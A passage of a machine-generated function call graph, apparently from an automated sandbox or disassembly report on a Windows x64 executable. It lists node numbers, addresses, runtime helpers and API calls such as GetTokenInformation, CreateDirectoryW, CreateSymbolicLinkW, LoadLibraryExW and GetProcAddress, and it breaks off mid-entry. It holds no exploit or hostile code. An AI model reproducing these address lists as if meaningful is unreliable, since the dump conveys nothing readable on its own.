17411->17400 17413 7ff7e531b2c8 _set_fmode 11 API calls 17412->17413 17414 7ff7e5315177 17413->17414 17415 7ff7e53029e5 17414->17415 17416 7ff7e531eb98 _set_fmode 11 API calls 17414->17416 17418 7ff7e53151b7 17414->17418 17415->17356 17417 7ff7e53151ac 17416->17417 17419 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17417->17419 17418->17415 17571 7ff7e531ec20 17418->17571 17419->17418 17422 7ff7e531a900 _isindst 17 API calls 17423 7ff7e53151fc 17422->17423 17425 7ff7e530262f 17424->17425 17426 7ff7e5309390 2 API calls 17425->17426 17427 7ff7e5302660 17426->17427 17428 7ff7e5302683 MessageBoxA 17427->17428 17429 7ff7e530266f MessageBoxW 17427->17429 17430 7ff7e5302690 17428->17430 17429->17430 17431 7ff7e530c550 _log10_special 8 API calls 17430->17431 17432 7ff7e53026a0 17431->17432 17432->17360 17434 7ff7e5312c4e 17433->17434 17435 7ff7e5312c3e 17433->17435 17436 7ff7e5312c57 17434->17436 17441 7ff7e5312c85 17434->17441 17438 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17435->17438 17439 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17436->17439 17437 7ff7e5312c7d 17437->17401 17437->17406 17437->17407 17437->17410 17438->17437 17439->17437 17440 7ff7e53147c0 45 API calls 17440->17441 17441->17435 17441->17437 17441->17440 17443 7ff7e5312f34 17441->17443 17447 7ff7e53135a0 17441->17447 17473 7ff7e5313268 17441->17473 17503 7ff7e5312af0 17441->17503 17445 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17443->17445 17445->17435 17448 7ff7e53135e2 17447->17448 17449 7ff7e5313655 17447->17449 17450 7ff7e53135e8 17448->17450 17451 7ff7e531367f 17448->17451 17452 7ff7e531365a 17449->17452 17453 7ff7e53136af 17449->17453 17459 7ff7e53135ed 17450->17459 17462 7ff7e53136be 17450->17462 17520 7ff7e5311b50 17451->17520 17454 7ff7e531365c 17452->17454 17455 7ff7e531368f 17452->17455 17453->17451 17453->17462 17470 7ff7e5313618 17453->17470 17457 7ff7e53135fd 17454->17457 17461 7ff7e531366b 17454->17461 17527 7ff7e5311740 17455->17527 17472 7ff7e53136ed 17457->17472 17506 7ff7e5313f04 17457->17506 17459->17457 17463 7ff7e5313630 17459->17463 17459->17470 17461->17451 17465 7ff7e5313670 17461->17465 17462->17472 17534 7ff7e5311f60 17462->17534 17463->17472 17516 7ff7e53143c0 17463->17516 17468 7ff7e5314558 37 API calls 17465->17468 17465->17472 17467 7ff7e530c550 _log10_special 8 API calls 17469 7ff7e5313983 17467->17469 17468->17470 17469->17441 17470->17472 17541 7ff7e531e858 17470->17541 17472->17467 17474 7ff7e5313289 17473->17474 17475 7ff7e5313273 17473->17475 17476 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17474->17476 17477 7ff7e53132c7 17474->17477 17475->17477 17478 7ff7e53135e2 17475->17478 17479 7ff7e5313655 17475->17479 17476->17477 17477->17441 17480 7ff7e53135e8 17478->17480 17481 7ff7e531367f 17478->17481 17482 7ff7e531365a 17479->17482 17483 7ff7e53136af 17479->17483 17490 7ff7e53135ed 17480->17490 17493 7ff7e53136be 17480->17493 17486 7ff7e5311b50 38 API calls 17481->17486 17484 7ff7e531365c 17482->17484 17485 7ff7e531368f 17482->17485 17483->17481 17483->17493 17501 7ff7e5313618 17483->17501 17487 7ff7e53135fd 17484->17487 17491 7ff7e531366b 17484->17491 17488 7ff7e5311740 38 API calls 17485->17488 17486->17501 17489 7ff7e5313f04 47 API calls 17487->17489 17502 7ff7e53136ed 17487->17502 17488->17501 17489->17501 17490->17487 17492 7ff7e5313630 17490->17492 17490->17501 17491->17481 17495 7ff7e5313670 17491->17495 17496 7ff7e53143c0 47 API calls 17492->17496 17492->17502 17494 7ff7e5311f60 38 API calls 17493->17494 17493->17502 17494->17501 17498 7ff7e5314558 37 API calls 17495->17498 17495->17502 17496->17501 17497 7ff7e530c550 _log10_special 8 API calls 17499 7ff7e5313983 17497->17499 17498->17501 17499->17441 17500 7ff7e531e858 47 API calls 17500->17501 17501->17500 17501->17502 17502->17497 17554 7ff7e5310d14 17503->17554 17507 7ff7e5313f26 17506->17507 17508 7ff7e5310b80 12 API calls 17507->17508 17509 7ff7e5313f6e 17508->17509 17510 7ff7e531e570 46 API calls 17509->17510 17511 7ff7e5314041 17510->17511 17512 7ff7e53147c0 45 API calls 17511->17512 17514 7ff7e5314063 17511->17514 17512->17514 17513 7ff7e53147c0 45 API calls 17515 7ff7e53140ec 17513->17515 17514->17513 17514->17514 17514->17515 17515->17470 17517 7ff7e53143d8 17516->17517 17519 7ff7e5314440 17516->17519 17518 7ff7e531e858 47 API calls 17517->17518 17517->17519 17518->17519 17519->17470 17521 7ff7e5311b83 17520->17521 17522 7ff7e5311bb2 17521->17522 17524 7ff7e5311c6f 17521->17524 17523 7ff7e5310b80 12 API calls 17522->17523 17526 7ff7e5311bef 17522->17526 17523->17526 17525 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17524->17525 17525->17526 17526->17470 17528 7ff7e5311773 17527->17528 17529 7ff7e53117a2 17528->17529 17531 7ff7e531185f 17528->17531 17530 7ff7e5310b80 12 API calls 17529->17530 17533 7ff7e53117df 17529->17533 17530->17533 17532 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17531->17532 17532->17533 17533->17470 17535 7ff7e5311f93 17534->17535 17536 7ff7e5311fc2 17535->17536 17538 7ff7e531207f 17535->17538 17537 7ff7e5310b80 12 API calls 17536->17537 17540 7ff7e5311fff 17536->17540 17537->17540 17539 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17538->17539 17539->17540 17540->17470 17542 7ff7e531e880 17541->17542 17543 7ff7e531e8c5 17542->17543 17544 7ff7e53147c0 45 API calls 17542->17544 17547 7ff7e531e885 memcpy_s 17542->17547 17549 7ff7e531e8ae memcpy_s 17542->17549 17543->17547 17543->17549 17551 7ff7e53207e8 17543->17551 17544->17543 17545 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17545->17547 17547->17470 17549->17545 17549->17547 17553 7ff7e532080c WideCharToMultiByte 17551->17553 17555 7ff7e5310d41 17554->17555 17556 7ff7e5310d53 17554->17556 17557 7ff7e5314f08 _set_fmode 11 API calls 17555->17557 17559 7ff7e5310d60 17556->17559 17562 7ff7e5310d9d 17556->17562 17558 7ff7e5310d46 17557->17558 17560 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17558->17560 17561 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17559->17561 17563 7ff7e5310d51 17560->17563 17561->17563 17564 7ff7e5310e46 17562->17564 17565 7ff7e5314f08 _set_fmode 11 API calls 17562->17565 17563->17441 17564->17563 17566 7ff7e5314f08 _set_fmode 11 API calls 17564->17566 17567 7ff7e5310e3b 17565->17567 17568 7ff7e5310ef0 17566->17568 17569 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17567->17569 17570 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17568->17570 17569->17564 17570->17563 17576 7ff7e531ec3d 17571->17576 17572 7ff7e531ec42 17573 7ff7e53151dd 17572->17573 17574 7ff7e5314f08 _set_fmode 11 API calls 17572->17574 17573->17415 17573->17422 17575 7ff7e531ec4c 17574->17575 17577 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17575->17577 17576->17572 17576->17573 17578 7ff7e531ec8c 17576->17578 17577->17573 17578->17573 17579 7ff7e5314f08 _set_fmode 11 API calls 17578->17579 17579->17575 17581 7ff7e53085b1 GetTokenInformation 17580->17581 17582 7ff7e5308633 __std_exception_copy 17580->17582 17583 7ff7e53085d2 GetLastError 17581->17583 17584 7ff7e53085dd 17581->17584 17585 7ff7e530864c 17582->17585 17586 7ff7e5308646 CloseHandle 17582->17586 17583->17582 17583->17584 17584->17582 17587 7ff7e53085f9 GetTokenInformation 17584->17587 17585->16721 17586->17585 17587->17582 17588 7ff7e530861c 17587->17588 17588->17582 17589 7ff7e5308626 ConvertSidToStringSidW 17588->17589 17589->17582 17591 7ff7e530c850 17590->17591 17592 7ff7e5302b74 GetCurrentProcessId 17591->17592 17593 7ff7e53026b0 48 API calls 17592->17593 17594 7ff7e5302bc7 17593->17594 17595 7ff7e5314bd8 48 API calls 17594->17595 17596 7ff7e5302c10 MessageBoxW 17595->17596 17597 7ff7e530c550 _log10_special 8 API calls 17596->17597 17598 7ff7e5302c40 17597->17598 17598->16731 17600 7ff7e53025e5 17599->17600 17601 7ff7e5314bd8 48 API calls 17600->17601 17602 7ff7e5302604 17601->17602 17602->16747 17648 7ff7e5318794 17603->17648 17607 7ff7e53081dc 17606->17607 17608 7ff7e5309390 2 API calls 17607->17608 17609 7ff7e53081fb 17608->17609 17610 7ff7e5308203 17609->17610 17611 7ff7e5308216 ExpandEnvironmentStringsW 17609->17611 17612 7ff7e5302810 49 API calls 17610->17612 17613 7ff7e530823c __std_exception_copy 17611->17613 17619 7ff7e530820f __std_exception_copy 17612->17619 17614 7ff7e5308240 17613->17614 17615 7ff7e5308253 17613->17615 17617 7ff7e5302810 49 API calls 17614->17617 17620 7ff7e53082bf 17615->17620 17621 7ff7e5308261 GetDriveTypeW 17615->17621 17616 7ff7e530c550 _log10_special 8 API calls 17618 7ff7e53083af 17616->17618 17617->17619 17618->16745 17638 7ff7e5318238 17618->17638 17619->17616 17623 7ff7e5317e08 45 API calls 17620->17623 17624 7ff7e53082b0 17621->17624 17625 7ff7e5308295 17621->17625 17626 7ff7e53082d1 17623->17626 17771 7ff7e531796c 17624->17771 17629 7ff7e5302810 49 API calls 17625->17629 17627 7ff7e53082d9 17626->17627 17628 7ff7e53082ec 17626->17628 17631 7ff7e5302810 49 API calls 17627->17631 17632 7ff7e530834e CreateDirectoryW 17628->17632 17633 7ff7e53026b0 48 API calls 17628->17633 17629->17619 17631->17619 17632->17619 17634 7ff7e530835d GetLastError 17632->17634 17635 7ff7e5308328 CreateDirectoryW 17633->17635 17634->17619 17636 7ff7e530836a GetLastError 17634->17636 17635->17628 17637 7ff7e5302c50 51 API calls 17636->17637 17637->17619 17639 7ff7e5318258 17638->17639 17640 7ff7e5318245 17638->17640 17787 7ff7e5317ebc 17639->17787 17641 7ff7e5314f08 _set_fmode 11 API calls 17640->17641 17643 7ff7e531824a 17641->17643 17645 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17643->17645 17646 7ff7e5318256 17645->17646 17646->16750 17689 7ff7e5321558 17648->17689 17748 7ff7e53212d0 17689->17748 17769 7ff7e53202d8 EnterCriticalSection 17748->17769 17772 7ff7e531798a 17771->17772 17775 7ff7e53179bd 17771->17775 17772->17775 17778 7ff7e5320474 17772->17778 17775->17619 17776 7ff7e531a900 _isindst 17 API calls 17777 7ff7e53179ed 17776->17777 17779 7ff7e5320481 17778->17779 17781 7ff7e532048b 17778->17781 17779->17781 17785 7ff7e53204a7 17779->17785 17780 7ff7e5314f08 _set_fmode 11 API calls 17782 7ff7e5320493 17780->17782 17781->17780 17783 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 17782->17783 17784 7ff7e53179b9 17783->17784 17784->17775 17784->17776 17785->17784 17786 7ff7e5314f08 _set_fmode 11 API calls 17785->17786 17786->17782 17794 7ff7e53202d8 EnterCriticalSection 17787->17794 17796 7ff7e530456a 17795->17796 17797 7ff7e5309390 2 API calls 17796->17797 17798 7ff7e530458f 17797->17798 17799 7ff7e530c550 _log10_special 8 API calls 17798->17799 17800 7ff7e53045b7 17799->17800 17800->16784 17803 7ff7e5307e2e 17801->17803 17802 7ff7e5307f52 17805 7ff7e530c550 _log10_special 8 API calls 17802->17805 17803->17802 17804 7ff7e5301c80 49 API calls 17803->17804 17809 7ff7e5307eb5 17804->17809 17806 7ff7e5307f83 17805->17806 17806->16784 17807 7ff7e5301c80 49 API calls 17807->17809 17808 7ff7e5304560 10 API calls 17808->17809 17809->17802 17809->17807 17809->17808 17810 7ff7e5309390 2 API calls 17809->17810 17811 7ff7e5307f23 CreateDirectoryW 17810->17811 17811->17802 17811->17809 17813 7ff7e5301613 17812->17813 17814 7ff7e5301637 17812->17814 17933 7ff7e5301050 17813->17933 17815 7ff7e53045c0 108 API calls 17814->17815 17817 7ff7e530164b 17815->17817 17819 7ff7e5301653 17817->17819 17820 7ff7e5301682 17817->17820 17818 7ff7e5301618 17821 7ff7e530162e 17818->17821 17824 7ff7e5302710 54 API calls 17818->17824 17822 7ff7e5314f08 _set_fmode 11 API calls 17819->17822 17823 7ff7e53045c0 108 API calls 17820->17823 17821->16784 17825 7ff7e5301658 17822->17825 17826 7ff7e5301696 17823->17826 17824->17821 17827 7ff7e5302910 54 API calls 17825->17827 17828 7ff7e530169e 17826->17828 17829 7ff7e53016b8 17826->17829 17830 7ff7e5301671 17827->17830 17831 7ff7e5302710 54 API calls 17828->17831 17832 7ff7e53106d4 73 API calls 17829->17832 17830->16784 17834 7ff7e53016ae 17831->17834 17833 7ff7e53016cd 17832->17833 17835 7ff7e53016d1 17833->17835 17836 7ff7e53016f9 17833->17836 17840 7ff7e531004c 74 API calls 17834->17840 17837 7ff7e5314f08 _set_fmode 11 API calls 17835->17837 17838 7ff7e53016ff 17836->17838 17839 7ff7e5301717 17836->17839 17841 7ff7e53016d6 17837->17841 17911 7ff7e5301210 17838->17911 17845 7ff7e5301739 17839->17845 17856 7ff7e5301761 17839->17856 17843 7ff7e5301829 17840->17843 17844 7ff7e5302910 54 API calls 17841->17844 17843->16784 17851 7ff7e53016ef __std_exception_copy 17844->17851 17847 7ff7e5314f08 _set_fmode 11 API calls 17845->17847 17846 7ff7e531004c 74 API calls 17846->17834 17848 7ff7e530173e 17847->17848 17849 7ff7e5302910 54 API calls 17848->17849 17849->17851 17850 7ff7e531039c _fread_nolock 53 API calls 17850->17856 17851->17846 17852 7ff7e53017da 17853 7ff7e5314f08 _set_fmode 11 API calls 17852->17853 17855 7ff7e53017ca 17853->17855 17858 7ff7e5302910 54 API calls 17855->17858 17856->17850 17856->17851 17856->17852 17857 7ff7e53017c5 17856->17857 17964 7ff7e5310adc 17856->17964 17859 7ff7e5314f08 _set_fmode 11 API calls 17857->17859 17858->17851 17859->17855 17861 7ff7e530718b 17860->17861 17863 7ff7e5307144 17860->17863 17861->16784 17863->17861 17997 7ff7e5315024 17863->17997 17865 7ff7e53041a1 17864->17865 17866 7ff7e53044e0 49 API calls 17865->17866 17867 7ff7e53041db 17866->17867 17868 7ff7e53044e0 49 API calls 17867->17868 17869 7ff7e53041eb 17868->17869 17870 7ff7e530420d 17869->17870 17871 7ff7e530423c 17869->17871 18012 7ff7e5304110 17870->18012 17873 7ff7e5304110 51 API calls 17871->17873 17874 7ff7e530423a 17873->17874 17875 7ff7e530429c 17874->17875 17876 7ff7e5304267 17874->17876 17877 7ff7e5304110 51 API calls 17875->17877 18019 7ff7e5307cf0 17876->18019 17879 7ff7e53042c0 17877->17879 17882 7ff7e5304110 51 API calls 17879->17882 17893 7ff7e5304312 17879->17893 17881 7ff7e5304297 17887 7ff7e530c550 _log10_special 8 API calls 17881->17887 17885 7ff7e53042e9 17882->17885 17883 7ff7e5304393 17886 7ff7e5301950 115 API calls 17883->17886 17884 7ff7e5302710 54 API calls 17884->17881 17890 7ff7e5304110 51 API calls 17885->17890 17885->17893 17889 7ff7e530439d 17886->17889 17888 7ff7e5304435 17887->17888 17888->16784 17891 7ff7e53043a5 17889->17891 17892 7ff7e53043fe 17889->17892 17890->17893 18045 7ff7e5301840 17891->18045 17895 7ff7e5302710 54 API calls 17892->17895 17893->17883 17894 7ff7e530438c 17893->17894 17896 7ff7e5304317 17893->17896 17898 7ff7e530437b 17893->17898 17894->17891 17894->17896 17895->17896 17901 7ff7e5302710 54 API calls 17896->17901 17900 7ff7e5302710 54 API calls 17898->17900 17900->17896 17901->17881 17902 7ff7e53043d2 17904 7ff7e5301600 118 API calls 17902->17904 17903 7ff7e53043bc 17905 7ff7e5302710 54 API calls 17903->17905 17906 7ff7e53043e0 17904->17906 17905->17881 17906->17881 17907 7ff7e5302710 54 API calls 17906->17907 17907->17881 17909 7ff7e5301c80 49 API calls 17908->17909 17910 7ff7e5304474 17909->17910 17910->16784 17912 7ff7e5301268 17911->17912 17913 7ff7e530126f 17912->17913 17914 7ff7e5301297 17912->17914 17915 7ff7e5302710 54 API calls 17913->17915 17917 7ff7e53012d4 17914->17917 17918 7ff7e53012b1 17914->17918 17916 7ff7e5301282 17915->17916 17916->17851 17922 7ff7e53012e6 17917->17922 17931 7ff7e5301309 memcpy_s 17917->17931 17919 7ff7e5314f08 _set_fmode 11 API calls 17918->17919 17920 7ff7e53012b6 17919->17920 17921 7ff7e5302910 54 API calls 17920->17921 17927 7ff7e53012cf __std_exception_copy 17921->17927 17923 7ff7e5314f08 _set_fmode 11 API calls 17922->17923 17924 7ff7e53012eb 17923->17924 17926 7ff7e5302910 54 API calls 17924->17926 17925 7ff7e531039c _fread_nolock 53 API calls 17925->17931 17926->17927 17927->17851 17928 7ff7e53013cf 17929 7ff7e5302710 54 API calls 17928->17929 17929->17927 17930 7ff7e5310adc 76 API calls 17930->17931 17931->17925 17931->17927 17931->17928 17931->17930 17932 7ff7e5310110 37 API calls 17931->17932 17932->17931 17934 7ff7e53045c0 108 API calls 17933->17934 17935 7ff7e530108c 17934->17935 17936 7ff7e5301094 17935->17936 17937 7ff7e53010a9 17935->17937 17938 7ff7e5302710 54 API calls 17936->17938 17939 7ff7e53106d4 73 API calls 17937->17939 17945 7ff7e53010a4 __std_exception_copy 17938->17945 17940 7ff7e53010bf 17939->17940 17941 7ff7e53010e6 17940->17941 17942 7ff7e53010c3 17940->17942 17947 7ff7e5301122 17941->17947 17948 7ff7e53010f7 17941->17948 17943 7ff7e5314f08 _set_fmode 11 API calls 17942->17943 17944 7ff7e53010c8 17943->17944 17946 7ff7e5302910 54 API calls 17944->17946 17945->17818 17949 7ff7e53010e1 __std_exception_copy 17946->17949 17951 7ff7e5301129 17947->17951 17959 7ff7e530113c 17947->17959 17950 7ff7e5314f08 _set_fmode 11 API calls 17948->17950 17955 7ff7e531004c 74 API calls 17949->17955 17953 7ff7e5301100 17950->17953 17952 7ff7e5301210 92 API calls 17951->17952 17952->17949 17954 7ff7e5302910 54 API calls 17953->17954 17954->17949 17956 7ff7e53011b4 17955->17956 17956->17945 17968 7ff7e53046f0 17956->17968 17957 7ff7e531039c _fread_nolock 53 API calls 17957->17959 17959->17949 17959->17957 17960 7ff7e53011ed 17959->17960 17961 7ff7e5314f08 _set_fmode 11 API calls 17960->17961 17962 7ff7e53011f2 17961->17962 17963 7ff7e5302910 54 API calls 17962->17963 17963->17949 17965 7ff7e5310b0c 17964->17965 17982 7ff7e531082c 17965->17982 17967 7ff7e5310b2a 17967->17856 17969 7ff7e5304700 17968->17969 17970 7ff7e5309390 2 API calls 17969->17970 17971 7ff7e530472b 17970->17971 17972 7ff7e5309390 2 API calls 17971->17972 17981 7ff7e530479e 17971->17981 17974 7ff7e5304746 17972->17974 17973 7ff7e530c550 _log10_special 8 API calls 17975 7ff7e53047b9 17973->17975 17976 7ff7e530474b CreateSymbolicLinkW 17974->17976 17974->17981 17975->17945 17977 7ff7e5304775 17976->17977 17976->17981 17978 7ff7e530477e GetLastError 17977->17978 17977->17981 17978->17981 17981->17973 17983 7ff7e531084c 17982->17983 17988 7ff7e5310879 17982->17988 17984 7ff7e5310881 17983->17984 17985 7ff7e5310856 17983->17985 17983->17988 17989 7ff7e531076c 17984->17989 17986 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 17985->17986 17986->17988 17988->17967 17996 7ff7e531546c EnterCriticalSection 17989->17996 17998 7ff7e5315031 17997->17998 17999 7ff7e531505e 17997->17999 18001 7ff7e5314f08 _set_fmode 11 API calls 17998->18001 18009 7ff7e5314fe8 17998->18009 18000 7ff7e5315081 17999->18000 18004 7ff7e531509d 17999->18004 18003 7ff7e5314f08 _set_fmode 11 API calls 18000->18003 18002 7ff7e531503b 18001->18002 18005 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18002->18005 18006 7ff7e5315086 18003->18006 18007 7ff7e5314f4c 45 API calls 18004->18007 18008 7ff7e5315046 18005->18008 18010 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18006->18010 18011 7ff7e5315091 18007->18011 18008->17863 18009->17863 18010->18011 18011->17863 18013 7ff7e5304136 18012->18013 18014 7ff7e5314984 49 API calls 18013->18014 18015 7ff7e530415c 18014->18015 18016 7ff7e530416d 18015->18016 18017 7ff7e5304560 10 API calls 18015->18017 18016->17874 18018 7ff7e530417f 18017->18018 18018->17874 18020 7ff7e5307d05 18019->18020 18021 7ff7e53045c0 108 API calls 18020->18021 18022 7ff7e5307d2b 18021->18022 18023 7ff7e53045c0 108 API calls 18022->18023 18036 7ff7e5307d52 18022->18036 18024 7ff7e5307d42 18023->18024 18026 7ff7e5307d4d 18024->18026 18027 7ff7e5307d5c 18024->18027 18025 7ff7e530c550 _log10_special 8 API calls 18028 7ff7e5304277 18025->18028 18029 7ff7e531004c 74 API calls 18026->18029 18049 7ff7e53100e4 18027->18049 18028->17881 18028->17884 18029->18036 18031 7ff7e5307d61 18034 7ff7e531039c _fread_nolock 53 API calls 18031->18034 18037 7ff7e5307dc6 18031->18037 18038 7ff7e5310adc 76 API calls 18031->18038 18040 7ff7e5307dc1 18031->18040 18041 7ff7e5310110 37 API calls 18031->18041 18043 7ff7e5307dbf 18031->18043 18044 7ff7e53100e4 37 API calls 18031->18044 18032 7ff7e531004c 74 API calls 18033 7ff7e5307de7 18032->18033 18034->18031 18036->18025 18039 7ff7e5310110 37 API calls 18037->18039 18038->18031 18039->18040 18040->18043 18055 7ff7e5317318 18040->18055 18041->18031 18043->18032 18044->18031 18047 7ff7e5301865 18045->18047 18048 7ff7e53018d5 18045->18048 18046 7ff7e5315024 45 API calls 18046->18047 18047->18046 18047->18048 18048->17902 18048->17903 18050 7ff7e53100ed 18049->18050 18051 7ff7e53100fd 18049->18051 18052 7ff7e5314f08 _set_fmode 11 API calls 18050->18052 18051->18031 18053 7ff7e53100f2 18052->18053 18054 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18053->18054 18054->18051 18056 7ff7e5317320 18055->18056 18076 7ff7e5315ec8 18075->18076 18077 7ff7e5315eee 18076->18077 18080 7ff7e5315f21 18076->18080 18078 7ff7e5314f08 _set_fmode 11 API calls 18077->18078 18079 7ff7e5315ef3 18078->18079 18083 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18079->18083 18081 7ff7e5315f27 18080->18081 18082 7ff7e5315f34 18080->18082 18084 7ff7e5314f08 _set_fmode 11 API calls 18081->18084 18094 7ff7e531ac28 18082->18094 18086 7ff7e5304616 18083->18086 18084->18086 18086->16809 18107 7ff7e53202d8 EnterCriticalSection 18094->18107 18467 7ff7e53178f8 18466->18467 18470 7ff7e53173d4 18467->18470 18469 7ff7e5317911 18469->16819 18471 7ff7e531741e 18470->18471 18472 7ff7e53173ef 18470->18472 18480 7ff7e531546c EnterCriticalSection 18471->18480 18474 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 18472->18474 18476 7ff7e531740f 18474->18476 18476->18469 18482 7ff7e530fe71 18481->18482 18483 7ff7e530fe43 18481->18483 18490 7ff7e530fe63 18482->18490 18491 7ff7e531546c EnterCriticalSection 18482->18491 18484 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 18483->18484 18484->18490 18490->16823 18493 7ff7e53045c0 108 API calls 18492->18493 18494 7ff7e5301493 18493->18494 18495 7ff7e53014bc 18494->18495 18496 7ff7e530149b 18494->18496 18498 7ff7e53106d4 73 API calls 18495->18498 18497 7ff7e5302710 54 API calls 18496->18497 18499 7ff7e53014ab 18497->18499 18500 7ff7e53014d1 18498->18500 18499->16856 18501 7ff7e53014d5 18500->18501 18502 7ff7e53014f8 18500->18502 18503 7ff7e5314f08 _set_fmode 11 API calls 18501->18503 18505 7ff7e5301532 18502->18505 18506 7ff7e5301508 18502->18506 18504 7ff7e53014da 18503->18504 18507 7ff7e5302910 54 API calls 18504->18507 18509 7ff7e5301538 18505->18509 18517 7ff7e530154b 18505->18517 18508 7ff7e5314f08 _set_fmode 11 API calls 18506->18508 18514 7ff7e53014f3 __std_exception_copy 18507->18514 18510 7ff7e5301510 18508->18510 18511 7ff7e5301210 92 API calls 18509->18511 18512 7ff7e5302910 54 API calls 18510->18512 18511->18514 18512->18514 18513 7ff7e531004c 74 API calls 18515 7ff7e53015c4 18513->18515 18514->18513 18515->16856 18516 7ff7e531039c _fread_nolock 53 API calls 18516->18517 18517->18514 18517->18516 18518 7ff7e53015d6 18517->18518 18519 7ff7e5314f08 _set_fmode 11 API calls 18518->18519 18520 7ff7e53015db 18519->18520 18521 7ff7e5302910 54 API calls 18520->18521 18521->18514 18523 7ff7e5309390 2 API calls 18522->18523 18524 7ff7e5308e94 LoadLibraryExW 18523->18524 18525 7ff7e5308eb3 __std_exception_copy 18524->18525 18525->16890 18599 7ff7e5306375 18598->18599 18600 7ff7e5301c80 49 API calls 18599->18600 18601 7ff7e53063b1 18600->18601 18602 7ff7e53063dd 18601->18602 18603 7ff7e53063ba 18601->18603 18605 7ff7e5304630 49 API calls 18602->18605 18604 7ff7e5302710 54 API calls 18603->18604 18628 7ff7e53063d3 18604->18628 18606 7ff7e53063f5 18605->18606 18607 7ff7e5306413 18606->18607 18610 7ff7e5302710 54 API calls 18606->18610 18608 7ff7e5304560 10 API calls 18607->18608 18611 7ff7e530641d 18608->18611 18609 7ff7e530c550 _log10_special 8 API calls 18612 7ff7e530336e 18609->18612 18610->18607 18613 7ff7e530642b 18611->18613 18614 7ff7e5308e80 3 API calls 18611->18614 18612->16925 18629 7ff7e5306500 18612->18629 18615 7ff7e5304630 49 API calls 18613->18615 18614->18613 18616 7ff7e5306444 18615->18616 18617 7ff7e5306469 18616->18617 18618 7ff7e5306449 18616->18618 18620 7ff7e5308e80 3 API calls 18617->18620 18619 7ff7e5302710 54 API calls 18618->18619 18619->18628 18621 7ff7e5306476 18620->18621 18622 7ff7e5306482 18621->18622 18623 7ff7e53064c1 18621->18623 18625 7ff7e5309390 2 API calls 18622->18625 18688 7ff7e5305830 GetProcAddress 18623->18688 18626 7ff7e530649a GetLastError 18625->18626 18627 7ff7e5302c50 51 API calls 18626->18627 18627->18628 18628->18609 18778 7ff7e5305400 18629->18778 18631 7ff7e5306526 18632 7ff7e530653f 18631->18632 18633 7ff7e530652e 18631->18633 18785 7ff7e5304c90 18632->18785 18634 7ff7e5302710 54 API calls 18633->18634 18640 7ff7e530653a 18634->18640 18637 7ff7e530655c 18641 7ff7e530656c 18637->18641 18643 7ff7e530657d 18637->18643 18638 7ff7e530654b 18639 7ff7e5302710 54 API calls 18638->18639 18639->18640 18640->16927 18642 7ff7e5302710 54 API calls 18641->18642 18642->18640 18644 7ff7e53065ad 18643->18644 18645 7ff7e530659c 18643->18645 18647 7ff7e53065cd 18644->18647 18648 7ff7e53065bc 18644->18648 18646 7ff7e5302710 54 API calls 18645->18646 18646->18640 18667 7ff7e5306070 18666->18667 18667->18667 18668 7ff7e5306099 18667->18668 18674 7ff7e53060b0 __std_exception_copy 18667->18674 18669 7ff7e5302710 54 API calls 18668->18669 18670 7ff7e53060a5 18669->18670 18670->16929 18671 7ff7e53061bb 18671->16929 18672 7ff7e5301470 116 API calls 18672->18674 18673 7ff7e5302710 54 API calls 18673->18674 18674->18671 18674->18672 18674->18673 18689 7ff7e5305852 GetLastError 18688->18689 18690 7ff7e530587f GetProcAddress 18688->18690 18691 7ff7e530585f 18689->18691 18692 7ff7e530589b GetLastError 18690->18692 18693 7ff7e53058aa GetProcAddress 18690->18693 18696 7ff7e5302c50 51 API calls 18691->18696 18692->18691 18694 7ff7e53058c6 GetLastError 18693->18694 18695 7ff7e53058d5 GetProcAddress 18693->18695 18694->18691 18697 7ff7e5305903 GetProcAddress 18695->18697 18698 7ff7e53058f1 GetLastError 18695->18698 18699 7ff7e5305874 18696->18699 18700 7ff7e5305931 GetProcAddress 18697->18700 18701 7ff7e530591f GetLastError 18697->18701 18698->18691 18699->18628 18701->18691 18780 7ff7e530542c 18778->18780 18779 7ff7e5305434 18779->18631 18780->18779 18783 7ff7e53055d4 18780->18783 18809 7ff7e5316aa4 18780->18809 18781 7ff7e5305797 __std_exception_copy 18781->18631 18782 7ff7e53047d0 47 API calls 18782->18783 18783->18781 18783->18782 18786 7ff7e5304cc0 18785->18786 18787 7ff7e530c550 _log10_special 8 API calls 18786->18787 18788 7ff7e5304d2a 18787->18788 18788->18637 18788->18638 18810 7ff7e5316ad4 18809->18810 18813 7ff7e5315fa0 18810->18813 18812 7ff7e5316b04 18812->18780 18814 7ff7e5315fd1 18813->18814 18815 7ff7e5315fe3 18813->18815 18816 7ff7e5314f08 _set_fmode 11 API calls 18814->18816 18817 7ff7e531602d 18815->18817 18819 7ff7e5315ff0 18815->18819 18818 7ff7e5315fd6 18816->18818 18820 7ff7e5316048 18817->18820 18824 7ff7e53147c0 45 API calls 18817->18824 18822 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18818->18822 18823 7ff7e531a814 _invalid_parameter_noinfo 37 API calls 18819->18823 18825 7ff7e531606a 18820->18825 18834 7ff7e5316a2c 18820->18834 18831 7ff7e5315fe1 18822->18831 18823->18831 18824->18820 18826 7ff7e531610b 18825->18826 18827 7ff7e5314f08 _set_fmode 11 API calls 18825->18827 18828 7ff7e5314f08 _set_fmode 11 API calls 18826->18828 18826->18831 18829 7ff7e5316100 18827->18829 18830 7ff7e53161b6 18828->18830 18832 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 18829->18832 18833 